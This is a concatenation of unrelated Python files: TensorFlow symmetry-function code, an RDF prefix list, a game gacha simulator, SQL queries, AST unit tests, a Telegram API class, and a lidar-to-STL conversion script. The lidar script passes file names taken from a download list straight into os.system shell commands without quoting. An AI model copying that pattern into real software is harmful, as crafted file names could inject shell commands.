theta = tf.acos(cut_cos_theta) # (n_samples, n_atoms, n_atoms, n_atoms)
# Removing the NaNs created by dividing by zero
clean_theta = tf.where(where_eq_idx, zeros_1, theta)
# cleaning up NaNs due by dummy atoms
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
dummy_mask_2d = tf.logical_and(tf.expand_dims(dummy_atoms, axis=1), tf.expand_dims(dummy_atoms, axis=-1))
dummy_mask_3d = tf.logical_and(tf.expand_dims(dummy_mask_2d, axis=1),
tf.expand_dims(tf.expand_dims(dummy_atoms, axis=-1), axis=-1))
cleaner_theta = tf.where(dummy_mask_3d, clean_theta, zeros_1)
# Finding the (0.5 * clean_sum_dist - R_s) term
with tf.name_scope("Exp_term"):
# Augmenting the dims of angular_rs
expanded_rs = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(angular_rs, axis=0), axis=0), axis=0),
axis=0) # (1, 1, 1, 1, n_rs)
# Augmenting the dim of clean_sum_dist *0.5
# expanded_sum = tf.expand_dims(clean_sum_dist * 0.5, axis=-1)
expanded_sum = tf.expand_dims(sum_dist_tensor * 0.5, axis=-1)
# Combining them
brac_term = tf.subtract(expanded_sum, expanded_rs)
# Finally making the exponential term
exponent = - eta * tf.square(brac_term)
exp_term = tf.exp(exponent) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs)
# Finding the cos(theta - theta_s) term
with tf.name_scope("Cos_term"):
# Augmenting the dimensions of theta_s
expanded_theta_s = tf.expand_dims(tf.expand_dims(tf.expand_dims(tf.expand_dims(theta_s, axis=0), axis=0), axis=0),
axis=0)
# Augmenting the dimensions of theta
expanded_theta = tf.expand_dims(cleaner_theta, axis=-1)
# Subtracting them and do the cos
cos_theta_term = tf.cos(
tf.subtract(expanded_theta, expanded_theta_s)) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
# Make the whole cos term of the sum
cos_term = tf.pow(tf.add(tf.ones(tf.shape(cos_theta_term), dtype=tf.float32), cos_theta_term),
zeta) # (n_samples, n_atoms, n_atoms, n_atoms, n_theta_s)
# Final product of terms inside the sum time by 2^(1-zeta)
expanded_fc = tf.expand_dims(tf.expand_dims(cleaner_fc_term, axis=-1), axis=-1, name="Expanded_fc")
expanded_cos = tf.expand_dims(cos_term, axis=-2, name="Expanded_cos")
expanded_exp = tf.expand_dims(exp_term, axis=-1, name="Expanded_exp")
const = tf.pow(tf.constant(2.0, dtype=tf.float32), (1.0 - zeta))
with tf.name_scope("Ang_term"):
prod_of_terms = const * tf.multiply(tf.multiply(expanded_cos, expanded_exp),
expanded_fc) # (n_samples, n_atoms, n_atoms, n_atoms, n_rs, n_theta_s)
# Reshaping to shape (n_samples, n_atoms, n_atoms, n_atoms, n_rs*n_theta_s)
presum_term = tf.reshape(prod_of_terms,
[tf.shape(prod_of_terms)[0], n_atoms, n_atoms, n_atoms,
theta_s.shape[0] * angular_rs.shape[0]])
return presum_term
def sum_rad(pre_sum, Zs, elements_list, radial_rs):
"""
Sum of the terms in the radial part of the symmetry function. The terms corresponding to the same neighbour identity
are summed together.
:param pre_sum: tf tensor of shape (n_samples, n_atoms, n_atoms, n_rs)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param elements_list: np.array of shape (n_elements,)
:param radial_rs: tf tensor of shape (n_rad_rs,)
:return: tf tensor of shape (n_samples, n_atoms, n_rad_rd * n_elements)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_elements = len(elements_list)
n_rs = radial_rs.get_shape().as_list()[0]
## Making a matrix of all the possible neighbouring atoms
# No need to clean up diagonal elements because they are already set to zero in the presum term
neighb_atoms = tf.tile(tf.expand_dims(tf.expand_dims(Zs, axis=1), axis=-1),
multiples=[1, n_atoms, 1, n_rs]) # (n_samples, n_atoms, n_atoms, n_rs)
zeros = tf.zeros(tf.shape(pre_sum), dtype=tf.float32)
# Looping over all the possible elements in the system and extracting the relevant terms from the pre_sum term
pre_sum_terms = []
for i in range(n_elements):
element = tf.constant(elements_list[i], dtype=tf.int32)
equal_elements = tf.equal(neighb_atoms, element)
slice_presum = tf.where(equal_elements, pre_sum, zeros)
slice_sum = tf.reduce_sum(slice_presum, axis=[2])
pre_sum_terms.append(slice_sum)
# Concatenating the extracted terms.
final_term = tf.concat(pre_sum_terms, axis=-1, name="sum_rad")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_elements*n_rs])
# clean_final_term = tf.where(mask, final_term, tf.zeros(final_term.shape, dtype=tf.float32))
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term), dtype=tf.float32))
return clean_final_term
def sum_ang(pre_sumterm, Zs, element_pairs_list, angular_rs, theta_s):
"""
This function does the sum of the terms in the radial part of the symmetry function. Three body interactions where
the two neighbours are the same elements are summed together.
:param pre_sumterm: tf tensor of shape (n_samples, n_atoms, n_ang_rs * n_thetas)
:param Zs: tf tensor of shape (n_samples, n_atoms)
:param element_pairs_list: np array of shape (n_elementpairs, 2)
:param angular_rs: tf tensor of shape (n_ang_rs,)
:param theta_s: tf tensor of shape (n_thetas,)
:return: tf tensor of shape (n_samples, n_atoms, n_ang_rs * n_thetas * n_elementpairs)
"""
n_atoms = Zs.get_shape().as_list()[1]
n_pairs = len(element_pairs_list)
n_rs = angular_rs.get_shape().as_list()[0]
n_thetas = theta_s.get_shape().as_list()[0]
# Making the pair matrix
Zs_exp_1 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=1), multiples=[1, n_atoms, 1]), axis=-1)
Zs_exp_2 = tf.expand_dims(tf.tile(tf.expand_dims(Zs, axis=-1), multiples=[1, 1, n_atoms]), axis=-1)
neighb_pairs = tf.concat([Zs_exp_1, Zs_exp_2], axis=-1) # (n_samples, n_atoms, n_atoms, 2)
# Cleaning up diagonal elements
zarray = np.zeros((n_atoms, n_atoms, 2))
for i in range(n_atoms):
zarray[i, i, :] = 1
# Make a bool tensor of the indices
where_eq_idx = tf.tile(tf.expand_dims(tf.convert_to_tensor(zarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, 2)
zeros = tf.zeros(tf.shape(neighb_pairs), dtype=tf.int32)
clean_pairs = tf.where(where_eq_idx, zeros, neighb_pairs)
# Sorting the pairs in descending order so that for example pair [7, 1] is the same as [1, 7]
sorted_pairs, _ = tf.nn.top_k(clean_pairs, k=2, sorted=True) # (n_samples, n_atoms, n_atoms, 2)
# Preparing to clean the sorted pairs from where there will be self interactions in the three-body-terms
oarray = np.ones((n_atoms, n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(n_atoms):
for k in range(n_atoms):
if i == j or i == k or j == k:
oarray[i, j, k] = 0
# Make a bool tensor of the indices
where_self_int = tf.tile(tf.expand_dims(tf.convert_to_tensor(oarray, dtype=tf.bool), axis=0),
multiples=[tf.shape(Zs)[0], 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms)
exp_self_int = tf.expand_dims(where_self_int, axis=-1) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
zeros_large = tf.zeros(tf.shape(pre_sumterm), dtype=tf.float32, name="zero_large")
presum_terms = []
with tf.name_scope("Extract"):
for i in range(n_pairs):
# Making a tensor where all the elements are the pair under consideration
pair = tf.constant(element_pairs_list[i], dtype=tf.int32)
expanded_pair = tf.tile(
tf.expand_dims(tf.expand_dims(tf.expand_dims(pair, axis=0), axis=0), axis=0),
multiples=[tf.shape(Zs)[0], n_atoms, n_atoms, 1], name="expand_pair") # (n_samples, n_atoms, n_atoms, 2)
# Comparing which neighbour pairs correspond to the pair under consideration
equal_pair_mix = tf.equal(expanded_pair, sorted_pairs)
equal_pair_split1, equal_pair_split2 = tf.split(equal_pair_mix, 2, axis=-1)
equal_pair = tf.tile(tf.expand_dims(tf.logical_and(equal_pair_split1, equal_pair_split2), axis=[1]),
multiples=[1, n_atoms, 1, 1, 1]) # (n_samples, n_atoms, n_atoms, n_atoms, 1)
# Removing the pairs where the same atom is present more than once
int_to_keep = tf.logical_and(equal_pair, exp_self_int)
exp_int_to_keep = tf.tile(int_to_keep, multiples=[1, 1, 1, 1, n_rs * n_thetas])
# Extracting the terms that correspond to the pair under consideration
slice_presum = tf.where(exp_int_to_keep, pre_sumterm, zeros_large, name="sl_pr_s")
slice_sum = 0.5 * tf.reduce_sum(slice_presum, axis=[2, 3], name="sum_ang")
presum_terms.append(slice_sum)
# Concatenating all of the terms corresponding to different pair neighbours
final_term = tf.concat(presum_terms, axis=-1, name="concat_presum")
# Cleaning up the dummy atoms descriptors
dummy_atoms = tf.logical_not(tf.equal(Zs, tf.constant(0, dtype=tf.int32))) # False where there are dummy atoms
mask = tf.tile(tf.expand_dims(dummy_atoms, axis=-1), multiples=[1, 1, n_thetas * n_rs * n_pairs])
clean_final_term = tf.where(mask, final_term, tf.zeros(tf.shape(final_term)))
return clean_final_term
def generate_parkhill_acsf(xyzs, Zs, elements, element_pairs, radial_cutoff, angular_cutoff,
radial_rs, angular_rs, theta_s, zeta, eta):
"""
This function generates the atom centred symmetry function as used in the Tensormol paper. Currently only tested for
single systems with many conformations. It requires the coordinates of all the atoms in each data sample, the atomic
charges for each atom (in the same order as the xyz), the overall elements and overall element pairs. Then it
requires the parameters for the ACSF that are used in the Tensormol paper: https://arxiv.org/pdf/1711.06385.pdf
:param xyzs: tensor of shape (n_samples, n_atoms, 3)
:param Zs: tensor of shape (n_samples, n_atoms)
:param elements: np.array of shape (n_elements,)
:param element_pairs: np.array of shape (n_elementpairs, 2)
:param radial_cutoff: scalar float
:param angular_cutoff: scalar float
:param radial_rs: np.array of shape (n_rad_rs,)
:param angular_rs: np.array of shape (n_ang_rs,)
:param theta_s: np.array of shape (n_thetas,)
:param zeta: scalar float
:param eta: scalar float
:return: a tf tensor of shape (n_samples, n_atoms, n_rad_rs * n_elements + n_ang_rs * n_thetas * n_elementpairs)
"""
with tf.name_scope("acsf_params"):
rad_cutoff = tf.constant(radial_cutoff, dtype=tf.float32)
ang_cutoff = tf.constant(angular_cutoff, dtype=tf.float32)
rad_rs = tf.constant(radial_rs, dtype=tf.float32)
ang_rs = tf.constant(angular_rs, dtype=tf.float32)
theta_s = tf.constant(theta_s, dtype=tf.float32)
zeta_tf = tf.constant(zeta, dtype=tf.float32)
eta_tf = tf.constant(eta, dtype=tf.float32)
## Calculating the radial part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Radial_part"):
pre_sum_rad = acsf_rad(xyzs, Zs, rad_cutoff, rad_rs, eta_tf) # (n_samples, n_atoms, n_atoms, n_rad_rs)
with tf.name_scope("Sum_rad"):
# Then summing based on the identity of the atoms interacting
rad_term = sum_rad(pre_sum_rad, Zs, elements, rad_rs) # (n_samples, n_atoms, n_rad_rs*n_elements)
## Calculating the angular part of the symmetry function
# First obtaining all the terms in the sum
with tf.name_scope("Angular_part"):
pre_sum_ang = acsf_ang(xyzs, Zs, ang_cutoff, ang_rs, theta_s, zeta_tf, eta_tf) # (n_samples, n_atoms, n_atoms, n_atoms, n_thetas * n_ang_rs)
with tf.name_scope("Sum_ang"):
# Then doing the sum based on the neighbrouing pair identity
ang_term = sum_ang(pre_sum_ang, Zs, element_pairs, ang_rs, theta_s) # (n_samples, n_atoms, n_thetas * n_ang_rs*n_elementpairs)
with tf.name_scope("ACSF"):
acsf = tf.concat([rad_term, ang_term], axis=-1, name="acsf") # (n_samples, n_atoms, n_rad_rs*n_elements + n_thetas * n_ang_rs*n_elementpairs)
return acsf
|
nilq/baby-python
|
python
|
# ro_prefixes.py
"""
Central list of prefixes commonly used with ROs
extended to support ro model updates and extensions for earth science (01/2017) by Raul Palma
"""
__authors__ = "Graham Klyne (GK@ACM.ORG), Raul Palma"
__copyright__ = "Copyright 2011-2013, University of Oxford"
__license__ = "MIT (http://opensource.org/licenses/MIT)"
prefixes = (
[ ("rdf", "http://www.w3.org/1999/02/22-rdf-syntax-ns#")
, ("rdfs", "http://www.w3.org/2000/01/rdf-schema#")
, ("owl", "http://www.w3.org/2002/07/owl#")
, ("xml", "http://www.w3.org/XML/1998/namespace")
, ("xsd", "http://www.w3.org/2001/XMLSchema#")
, ("rdfg", "http://www.w3.org/2004/03/trix/rdfg-1/")
, ("ro", "http://purl.org/wf4ever/ro#")
, ("roevo", "http://purl.org/wf4ever/roevo#")
, ("roterms", "http://purl.org/wf4ever/roterms#")
, ("wfprov", "http://purl.org/wf4ever/wfprov#")
, ("wfdesc", "http://purl.org/wf4ever/wfdesc#")
, ("wf4ever", "http://purl.org/wf4ever/wf4ever#")
, ("ore", "http://www.openarchives.org/ore/terms/")
, ("ao", "http://purl.org/ao/")
, ("dcterms", "http://purl.org/dc/terms/")
, ("dc", "http://purl.org/dc/elements/1.1/")
, ("foaf", "http://xmlns.com/foaf/0.1/")
, ("minim", "http://purl.org/minim/minim#")
, ("result", "http://www.w3.org/2001/sw/DataAccess/tests/result-set#")
, ("roes", "http://w3id.org/ro/earth-science#")
, ("oa", "http://www.w3.org/ns/oa#")
, ("pav", "http://purl.org/pav/")
, ("swrc", "http://swrc.ontoware.org/ontology#")
, ("cito", "http://purl.org/spar/cito/")
, ("dbo", "http://dbpedia.org/ontology/")
, ("ov", "http://open.vocab.org/terms/")
, ("bibo", "http://purl.org/ontology/bibo/")
, ("prov", "http://www.w3.org/ns/prov#")
, ("geo", "http://www.opengis.net/ont/geosparql#")
, ("sf", "http://www.opengis.net/ont/sf#")
, ("gml", "http://www.opengis.net/ont/gml#")
, ("odrs", "http://schema.theodi.org/odrs#")
, ("cc", "http://creativecommons.org/ns#")
, ("odrl", "http://www.w3.org/ns/odrl/2/")
, ("geo-wgs84", "http://www.w3.org/2003/01/geo/wgs84_pos#")
, ("voag", "http://voag.linkedmodel.org/schema/voag#")
# Workaround hack until Minim prefix handling is sorted out
, ("chembox", "http://dbpedia.org/resource/Template:Chembox:")
])
extra_prefixes = (
[ ("", "http://example.org/")
])
def make_turtle_prefixes(extra_prefixes=[]):
return"\n".join([ "@prefix %s: <%s> ."%p for p in prefixes+extra_prefixes ]) + "\n\n"
def make_sparql_prefixes(extra_prefixes=[]):
return"\n".join([ "PREFIX %s: <%s>"%p for p in prefixes+extra_prefixes ]) + "\n\n"
turtle_prefixstr = make_turtle_prefixes(extra_prefixes)
sparql_prefixstr = make_sparql_prefixes(extra_prefixes)
prefix_dict = dict(prefixes)
# from rocommand.ro_prefixes import prefixes, prefix_dict, make_turtle_prefixes, make_sparql_prefixes, sparql_prefixstr
|
nilq/baby-python
|
python
|
import random
from lxml import etree
from typing import List
from PIL import ImageDraw
from nonebot.log import logger
try:
import ujson as json
except ModuleNotFoundError:
import json
from .base_handle import BaseHandle, BaseData
from ..config import draw_config
from ..util import remove_prohibited_str, cn2py, load_font
from ..create_img import CreateImg
class FgoData(BaseData):
pass
class FgoChar(FgoData):
pass
class FgoCard(FgoData):
pass
class FgoHandle(BaseHandle[FgoData]):
def __init__(self):
super().__init__("fgo", "命运-冠位指定")
self.data_files.append("fgo_card.json")
self.max_star = 5
self.config = draw_config.fgo
self.ALL_CHAR: List[FgoChar] = []
self.ALL_CARD: List[FgoCard] = []
def get_card(self, mode: int = 1) -> FgoData:
if mode == 1:
star = self.get_star(
[8, 7, 6, 5, 4, 3],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
self.config.FGO_CARD_FIVE_P,
self.config.FGO_CARD_FOUR_P,
self.config.FGO_CARD_THREE_P,
],
)
elif mode == 2:
star = self.get_star(
[5, 4], [self.config.FGO_CARD_FIVE_P, self.config.FGO_CARD_FOUR_P]
)
else:
star = self.get_star(
[8, 7, 6],
[
self.config.FGO_SERVANT_FIVE_P,
self.config.FGO_SERVANT_FOUR_P,
self.config.FGO_SERVANT_THREE_P,
],
)
if star > 5:
star -= 3
chars = [x for x in self.ALL_CHAR if x.star == star and not x.limited]
else:
chars = [x for x in self.ALL_CARD if x.star == star and not x.limited]
return random.choice(chars)
def get_cards(self, count: int, **kwargs) -> List[FgoData]:
card_list = [] # 获取所有角色
servant_count = 0 # 保底计算
card_count = 0 # 保底计算
for _ in range(count):
servant_count += 1
card_count += 1
if card_count == 9: # 四星卡片保底
mode = 2
elif servant_count == 10: # 三星从者保底
mode = 3
else: # 普通抽
mode = 1
card = self.get_card(mode)
if isinstance(card, FgoCard) and card.star > self.max_star - 2:
card_count = 0
if isinstance(card, FgoChar):
servant_count = 0
card_list.append(card)
return card_list
def generate_card_img(self, card: FgoData) -> CreateImg:
sep_w = 5
sep_t = 5
sep_b = 20
w = 128
h = 140
bg = CreateImg(w + sep_w * 2, h + sep_t + sep_b)
img_path = str(self.img_path / f"{cn2py(card.name)}.png")
img = CreateImg(w, h, background=img_path)
bg.paste(img, (sep_w, sep_t), alpha=True)
# 加名字
text = card.name[:6] + "..." if len(card.name) > 7 else card.name
font = load_font(fontsize=16)
text_w, text_h = font.getsize(text)
draw = ImageDraw.Draw(bg.markImg)
draw.text(
(sep_w + (w - text_w) / 2, h + sep_t + (sep_b - text_h) / 2),
text,
font=font,
fill="gray",
)
return bg
def _init_data(self):
self.ALL_CHAR = [
FgoChar(
name=value["名称"],
star=int(value["星级"]),
limited=True
if not ("圣晶石召唤" in value["入手方式"] or "圣晶石召唤(Story卡池)" in value["入手方式"])
else False,
)
for value in self.load_data().values()
]
self.ALL_CARD = [
FgoCard(name=value["名称"], star=int(value["星级"]), limited=False)
for value in self.load_data("fgo_card.json").values()
]
async def _update_info(self):
# fgo.json
fgo_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/servant/ajax?card=&wd=&ids=&sort=12777&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn} page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["charid"],
"头像": x["icon"],
"名称": remove_prohibited_str(x["name"]),
"职阶": x["classes"],
"星级": int(x["star"]),
"hp": x["lvmax4hp"],
"atk": x["lvmax4atk"],
"card_quick": x["cardquick"],
"card_arts": x["cardarts"],
"card_buster": x["cardbuster"],
"宝具": x["tprop"],
}
fgo_info[name] = member_dict
# 更新额外信息
for key in fgo_info.keys():
url = f'http://fgo.vgtime.com/servant/{fgo_info[key]["id"]}'
result = await self.get_url(url)
if not result:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
continue
try:
dom = etree.HTML(result, etree.HTMLParser())
obtain = dom.xpath(
"//table[contains(string(.),'入手方式')]/tr[8]/td[3]/text()"
)[0]
obtain = str(obtain).strip()
if "限时活动免费获取 活动结束后无法获得" in obtain:
obtain = ["活动获取"]
elif "非限时UP无法获得" in obtain:
obtain = ["限时召唤"]
else:
if "&" in obtain:
obtain = obtain.split("&")
else:
obtain = obtain.split(" ")
obtain = [s.strip() for s in obtain if s.strip()]
fgo_info[key]["入手方式"] = obtain
except IndexError:
fgo_info[key]["入手方式"] = ["圣晶石召唤"]
logger.warning(f"{self.game_name_cn} 获取额外信息错误 {key}")
self.dump_data(fgo_info)
logger.info(f"{self.game_name_cn} 更新成功")
# fgo_card.json
fgo_card_info = {}
for i in range(500):
url = f"http://fgo.vgtime.com/equipment/ajax?wd=&ids=&sort=12958&o=desc&pn={i}"
result = await self.get_url(url)
if not result:
logger.warning(f"更新 {self.game_name_cn}卡牌 page {i} 出错")
continue
fgo_data = json.loads(result)
if int(fgo_data["nums"]) <= 0:
break
for x in fgo_data["data"]:
name = remove_prohibited_str(x["name"])
member_dict = {
"id": x["id"],
"card_id": x["equipid"],
"头像": x["icon"],
"名称": name,
"星级": int(x["star"]),
"hp": x["lvmax_hp"],
"atk": x["lvmax_atk"],
"skill_e": str(x["skill_e"]).split("<br />")[:-1],
}
fgo_card_info[name] = member_dict
self.dump_data(fgo_card_info, "fgo_card.json")
logger.info(f"{self.game_name_cn} 卡牌更新成功")
# 下载头像
for value in fgo_info.values():
await self.download_img(value["头像"], value["名称"])
for value in fgo_card_info.values():
await self.download_img(value["头像"], value["名称"])
|
nilq/baby-python
|
python
|
"""Queries to answer following questions"""
# How many total Characters are there?
QUERY_1 = '''SELECT COUNT(*)
FROM charactercreator_character;'''
# How many of each specific subclass?
QUERY_2 = '''SELECT (
SELECT COUNT(*)
FROM charactercreator_thief
) AS thief_class,
(
SELECT COUNT(*)
FROM charactercreator_cleric
) AS cleric_class,
(
SELECT COUNT(*)
FROM charactercreator_fighter
) AS fighter_class,
(
SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NOT NULL
) AS Necromancer_class,
(SELECT COUNT(*)
FROM charactercreator_mage
LEFT JOIN charactercreator_necromancer
ON character_ptr_id = mage_ptr_id
WHERE mage_ptr_id IS NULL
) AS Mage_class'''
# How many total items?
QUERY_3 = '''SELECT COUNT(*)
FROM armory_item;'''
# How many of the items are weapons? How many are not?
QUERY_4 = '''SELECT COUNT(*)
FROM armory_weapon'''
QUERY_5 = '''SELECT COUNT(*)
FROM armory_item
LEFT JOIN armory_weapon
on item_id = item_ptr_id
WHERE item_ptr_id IS NULL;'''
# How many items does each character have? (return first 20 rows)
# How many weapons does each character have? (return first 20 rows)
# On average, how many items does each character have?
# On average, how many weapons does each character have?
|
nilq/baby-python
|
python
|
from astutils import ast
def test_terminal():
value = 'a'
t = ast.Terminal(value)
r = repr(t)
assert r == "Terminal('a', 'terminal')", r
r = str(t)
assert r == 'a', r
r = len(t)
assert r == 1, r
r = t.flatten()
assert r == value, r
def test_hash():
# different AST node instances should
# have different hash
#
# terminals
value = 'foo'
a = ast.Terminal(value)
b = ast.Terminal(value)
assert hash(a) != hash(b)
# operators
op = 'bar'
a = ast.Operator(op)
b = ast.Operator(op)
assert hash(a) != hash(b)
def test_eq():
value = 'a'
t = ast.Terminal(value)
p = ast.Terminal(value)
assert t == p, (t, p)
p = ast.Terminal('b')
assert t != p, (t, p)
p = ast.Terminal(value, 'number')
assert t != p, (t, p)
p = 54
assert t != p, (t, p)
def test_operator():
a = ast.Terminal('a')
b = ast.Terminal('b')
op = '+'
operands = [a, b] # 'a', 'b' fail due to `str`
t = ast.Operator(op, *operands)
r = repr(t)
r_ = (
"Operator('+', "
"Terminal('a', 'terminal'), "
"Terminal('b', 'terminal'))")
assert r == r_, r
r = str(t)
assert r == '(+ a b)', r
r = len(t)
assert r == 3, r
r = t.flatten()
assert r == '( + a, b )', r
|
nilq/baby-python
|
python
|
num1 = 111
num2 = 222
num3 = 3333333333
num3 = 333
num4 = 44444
|
nilq/baby-python
|
python
|
# =============================================================================== #
# #
# This file has been generated automatically!! Do not change this manually! #
# #
# =============================================================================== #
from __future__ import annotations
from pydantic import Field
from ..base_object import BaseObject
class ToggleSupergroupIsAllHistoryAvailable(BaseObject):
"""
Toggles whether the message history of a supergroup is available to new members; requires can_change_info administrator right
:param supergroup_id: The identifier of the supergroup
:type supergroup_id: :class:`int`
:param is_all_history_available: The new value of is_all_history_available
:type is_all_history_available: :class:`bool`
"""
ID: str = Field("toggleSupergroupIsAllHistoryAvailable", alias="@type")
supergroup_id: int
is_all_history_available: bool
@staticmethod
def read(q: dict) -> ToggleSupergroupIsAllHistoryAvailable:
return ToggleSupergroupIsAllHistoryAvailable.construct(**q)
|
nilq/baby-python
|
python
|
import os
import sys
import zipfile
import asc_parse
import wget
import multiprocessing
import urllib.request as request
from contextlib import closing
import argparse
import shutil
import glob
# A decimal value that will decrease the output file size as it increases
REDUCE_BY = 1.0
# A decimal value that will make artificially make things taller as it increases
VERTICAL_SCALE = 1.0
# A decimal value that sets the base height of the model
BASE_HEIGHT = 0.0
# Disable this option if you want to generate a seperate DEM/STL for each LAS tile.
MERGE_LAS = False
# Generate 3D models
GENERATE_STLS = True
# Delete LAS Directory when finished
DELETE_LAS = False
# Enabling this option will generate .prj files for each generated .asc file. This requires blast2dem,
# a closed source utility that is part of lastools. If you enable this option, lastools will be automatically
# downloaded an unzipped, however, the output may not be used for commercial purposes unless you purchase
# a lastools license. This option is only necessary if you plan on using the DEMto3D plugin that is part of
# QGIS. More information about lastools licensing is available here:
# https://lastools.github.io/LICENSE.txt
QGIS_COMPATIBLE_DEM = False
if getattr(sys, 'frozen', False):
APPLICATION_PATH = os.path.dirname(sys.executable)
elif __file__:
APPLICATION_PATH = os.path.dirname(__file__)
GRID_EXE = os.path.join(APPLICATION_PATH, "GridSurfaceCreate64.exe")
D2A_EXE = os.path.join(APPLICATION_PATH, "DTM2ASCII.exe")
LASZIP_EXE = os.path.join(APPLICATION_PATH, "laszip-cli.exe")
LASTOOLS_URL = "http://lastools.github.io/download/LAStools.zip"
BLAST2DEM_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\blast2dem.exe")
LAS2LAS_EXE = os.path.join(APPLICATION_PATH, "LAStools\\bin\\las2las.exe")
# lastools isn't completely free/open source, so we can't distribute it with the program.
def install_lastools():
file_name = wget.filename_from_url(LASTOOLS_URL)
if not os.path.exists(BLAST2DEM_EXE):
print('lastools missing, downloading...')
with closing(request.urlopen(LASTOOLS_URL)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("")
os.remove(file_name)
def get_file_from_url(url, file_name):
# This is a pattern you'll see several times. I don't want to have to
# redo the whole process if it fails along the way.
if os.path.exists(file_name):
print(f"{file_name} already downloaded, skipping...")
return
with closing(request.urlopen(url)) as r:
with open(file_name, 'wb') as f:
shutil.copyfileobj(r, f)
print(f"Downloaded {url}")
def unzip_to_las(file_name, las_name):
print(f'Unzipping {file_name}')
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
with zipfile.ZipFile(file_name, "r") as zip_ref:
zip_ref.extractall("LAS")
def generate_dem_from_las(las_name, dem_name, filter: float = None, reduce_by: float = 1.0):
global GRID_EXE
if filter:
GRID_EXE += f' /spike:{filter}'
if os.path.exists(dem_name):
print(f'{dem_name} already exists, skipping...')
return
print(f'Generating {dem_name}')
os.system(f'{GRID_EXE} {dem_name} {reduce_by} M M 0 0 0 0 {las_name}')
def unzip_laz_file(laz_name, las_name):
if os.path.exists(las_name):
print(f'{las_name} already exists, skipping...')
return
print(f'Unzipping {laz_name} to {las_name}')
os.system(f'{LASZIP_EXE} -i {laz_name} -o {las_name}')
def main():
global VERTICAL_SCALE
global BASE_HEIGHT
global REDUCE_BY
global MERGE_LAS
global GENERATE_STLS
global DELETE_LAS
global QGIS_COMPATIBLE_DEM
global GRID_EXE
parser = argparse.ArgumentParser(description='A utility for automatically generating 3D printable STLs from USGS lidar scans.')
# Just in case the user doesn't pass in the file name, assume it's what the USGS names it.
parser.add_argument('--input', '-i', type=str, default='downloadlist.txt', help='The name of the file containing the URLs of all of the lidar scan data.')
parser.add_argument('--reduce', '-r', type=float, default=REDUCE_BY, help='A decimal value that will decrease the output file size as it increases. The default value is 1.0')
parser.add_argument('--vscale', '-v', type=float, default=VERTICAL_SCALE, help='A decimal value that will make artificially make things taller as it increases. The default value is 1.0')
parser.add_argument('--base', '-b', type=float, default=BASE_HEIGHT, help='A decimal value that sets the base height of the model. The default value is 0.0')
parser.add_argument('--merge', '-m', action='store_true', help='Using this flag will merge all of the point clouds into one file before converting into a DEM.')
parser.add_argument('--no_stl', '-s', action='store_false', help='Using this flag will disable STL generation.')
parser.add_argument('--cleanup', '-c', action='store_true', help='Using this flag will cause the program to automatically delete the unzipped point cloud files after running.')
parser.add_argument('--filter', '-f', type=float, default=False, help='A percent value (0-100, for the slope of the points being smoothed) that will enable the spike smoothing option. This is good if you have points that are floating way up above the model and causing spikes in your final model.')
parser.add_argument('--prj', '-p', action='store_true', help='Using this flag will cause the program to automatically download and use lastools to generate projection files for the elevation models. This is important if you want to generate the STLs yourself in QGIS, but it means you\'ll have to be mindful of lastool\'s license limitations. More info on lastool\'s website.')
parser.add_argument('--external_files', '-e', action='store_true', default=False, help='Using this flag will grab las/laz files from the LAS directory instead of downloading them from an input list.')
#parser.add_argument('--help', '-h', action='help')
args = parser.parse_args()
VERTICAL_SCALE = args.vscale
BASE_HEIGHT = args.base
REDUCE_BY = args.reduce
MERGE_LAS = args.merge
GENERATE_STLS = args.no_stl
DELETE_LAS = args.cleanup
QGIS_COMPATIBLE_DEM=args.prj
if args.filter:
GRID_EXE += f' /spike:{args.filter}'
if not args.external_files:
# For each tile in the USGS dataset, download the zip
f = open(args.input)
list_of_urls = []
list_of_zip = []
for line in f:
if not line.rstrip('\n').endswith('.zip'):
continue
print(line := line.rstrip('\n'))
file_name = wget.filename_from_url(line)
list_of_zip.append(file_name)
list_of_urls.append(line)
# This is the definitive list of all file names for each phase of the pipeline from here out.
list_of_files = [x.removesuffix('.zip') for x in list_of_zip]
list_of_las = [f'LAS\\{x}.las' for x in list_of_files]
if not os.path.exists('LAS'):
os.mkdir('LAS')
with multiprocessing.Pool(16) as p:
p.starmap(get_file_from_url, zip(list_of_urls, list_of_zip))
# Unzip each zip file that was downloaded
p.starmap(unzip_to_las, zip(list_of_zip, list_of_las))
list_of_laz = list(glob.glob('LAS\\*.laz'))
if list_of_laz:
print("LAZ files detected, unzipping...")
with multiprocessing.Pool() as p:
p.starmap(unzip_laz_file, zip(list_of_laz, [x.removesuffix('.laz') + '.las' for x in list_of_laz]))
